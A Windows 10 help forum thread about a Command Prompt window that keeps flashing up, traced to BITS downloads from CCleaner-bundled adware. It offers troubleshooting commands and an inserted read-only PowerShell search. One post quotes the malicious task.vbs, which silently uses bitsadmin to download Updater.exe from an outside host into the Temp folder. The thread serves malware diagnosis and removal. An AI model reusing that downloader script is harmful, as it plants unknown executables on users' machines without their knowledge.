Windows 10: Bitsadmin pops up randomly and immediately disappears (take 2?)
I hate to start naming people off here like an assembly line, but I find myself in the same situation as @tkrisz0403 in that my Command Prompt, accompanied by the exact same text as the former case, as seen in the first screen shot I provide which I managed to capture using OBS studio (please feel free to snoop through my dungeons and dragons writing at your leisure). I proceeded to follow some of the advice provided by @Hydranix and @Superfly by proceeding to download the bitsadmin buster.zip, which did promptly catch and freeze the process. The txt it provided was also identical, "Parent Process Name: cmd.exe" (of which I'll also produce a screenshot, mainly because I'm not knowledgeable enough to do anything else in a forum).
I then went on further with the instructions in that particular forum, first entering "Get-BitsTransfer -AllUsers | select -ExpandProperty FileList | Select -ExpandProperty RemoteName" into powershell as recommended by @Superfly, which gave me slightly different results. Still, cloudfront.net appeared to be the issue, as it came up in an almost identical fashion as in @tkrisz0403's case. I proceeded to enter the command prompt provided by @Superfly;
net stop BITS
del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr0.dat"
del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr1.dat"
net start BITS
net stop wuauserv
net start wuauserv
It was at this point the results appeared different enough that I, not being an expert in this field, didn't want to go any further, the results of which again being posted in a screen shot. I've downloaded ADWcleaner, which was the next recommended step to check for the possibility of malware, which I firmly believe it is, but have ceased to move forward until some fine chap comes along and tells me "Aw, you adorable little monkey, here, do this," and out of the kindness of their hearts decides to guide me through this process. I hope to hear from anyone and everyone soon, and I drink to your health and good fortune. Cheers ... (Hm, that emoji doesn't quite do me justice. I'm not a drunk, I'm just Irish, I swear.)
P.S. As an additional update, while typing this, I do believe I did see the command prompt pop up again, though I wasn't thoroughly paying attention and cannot be certain. Could be paranoia. Could be the buster ceased to work after a time. I'm not sure. As an additional precaution, I'm posting yet another screen of the command prompt that stayed after downloading and executing the bitsadmin buster.exe, though it is and has been completely blank. If there is any other information I can provide, I won't hesitate to do so.
It's a Google toolbar usually bundled with Ccleaner....a snooper, potentially unsafe.
To eradicate in Safe Mode...Hitman Pro or ADWcleaner.
Just a quick fyi for CCleaner users (like me): one week after a new edition hits their CCleaner builds page, they post a "slim" version of the program that has no bundleware in it at all. If you're willing to wait, you can skip that extra add-in altogether.
For example, ccsetup524.exe showed up on the site on Monday, Nov 14, I believe. That means ccsetup524-slim.exe should show up on 11/21. I'll wait to download and install that one, instead of the "Standard installer" version.
Thanks for the tip, Ed....a bit naughty in the first place CCleaner not notifying installed bundleware came with the package.
I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.
See here for removal instructions.
Confirmation of what was installed with CCleaner.....note the name change from your posted link but unmistakable connection.
OK, thanks for checking that out - what we need to do now is find that script and see what it calls via bitsadmin.
PS: Assuming we are on the right path with this....
The task.vbs apparently contains this:
It creates a bits job called "amijob" then downloads an updater exe to the temp folder. Waits a set period (I guess for the download to complete), it then cancels the bitsjob. Assuming another task then runs the updater from temp.
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high http://www.nice-doggy.xyz/run/Updater.exe C:\Users\Tejas\AppData\Local\Temp\amiupdater912.exe",0,False)
cmds=WshShell.RUN("bitsadmin /cancel amijob",0,False)
Set WshShell = Nothing
Info: Malware scan of task.vbs 04f5d27e461b2ff0da24b6a367b81d6d4d3c817d - Reason Core Security Labs
Last edited by Superfly; 16 Nov 2016 at 13:57.
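One way to do the search described above (find the script and see what it calls via bitsadmin), as an added example that is not part of any post in this thread. It only reads and lists; the search roots and file extensions are assumptions, and it is meant for an elevated PowerShell session.

```powershell
# Added example, read-only: lists findings, changes nothing.

# 1) Scheduled tasks whose action starts a script host, cmd or bitsadmin.
$launchers = 'wscript|cscript|bitsadmin|cmd\.exe|\.vbs'
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $line = "$($action.Execute) $($action.Arguments)".Trim()
        if ($line -match $launchers) {
            [pscustomobject]@{ Task = $task.TaskPath + $task.TaskName; Command = $line }
        }
    }
} | Format-List

# 2) Script files that contain a "bitsadmin /transfer" line; pull out the
#    job name, download URL and destination path from each hit.
#    Search roots and extensions are assumptions; widen them as needed.
$roots   = $env:APPDATA, $env:LOCALAPPDATA, $env:ProgramData
$pattern = 'bitsadmin\s+/transfer\s+(?<job>\S+).*?(?<url>https?://\S+)\s+"?(?<dest>[^"]+)'
Get-ChildItem -Path $roots -Recurse -File -Include *.vbs, *.js, *.bat, *.cmd -ErrorAction SilentlyContinue |
    Select-String -Pattern $pattern |
    ForEach-Object {
        $m = $_.Matches[0]
        [pscustomobject]@{
            Script = $_.Path
            Job    = $m.Groups['job'].Value
            Url    = $m.Groups['url'].Value
            Dest   = $m.Groups['dest'].Value
        }
    } | Format-List

# 3) Jobs still queued, with source and destination of every file.
Get-BitsTransfer -AllUsers | ForEach-Object {
    $job = $_
    foreach ($f in $job.FileList) {
        [pscustomobject]@{
            Job = $job.DisplayName; State = $job.JobState; Owner = $job.OwnerAccount
            Remote = $f.RemoteName; Local = $f.LocalName
        }
    }
} | Format-List

# 4) A cancelled job is gone from the queue, but the BITS client log still
#    records job creation (event 3) and transfer start (event 59, with URL).
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Bits-Client/Operational'; Id = 3, 59
} -MaxEvents 200 | Select-Object TimeCreated, Id, Message | Format-List
```

Step 4 matters for a script like the one quoted above, because a job that is cancelled right after the transfer will usually not appear in the step 3 listing.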
Quite a lot on my machine.....red markings my name.....how to differentiate between M$ and any intruder?...I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
Those are fine - they are just the executable and dependencies in the components folder... it's the hidden scripts that call it, that's the problem.
A bit off topic this but BitLocker will not do anything to stop you getting infected. Whether you have it turned on or not is transparent to programs running on your PC. It is to stop people getting information off your disk if you leave your laptop in a taxi or whatever.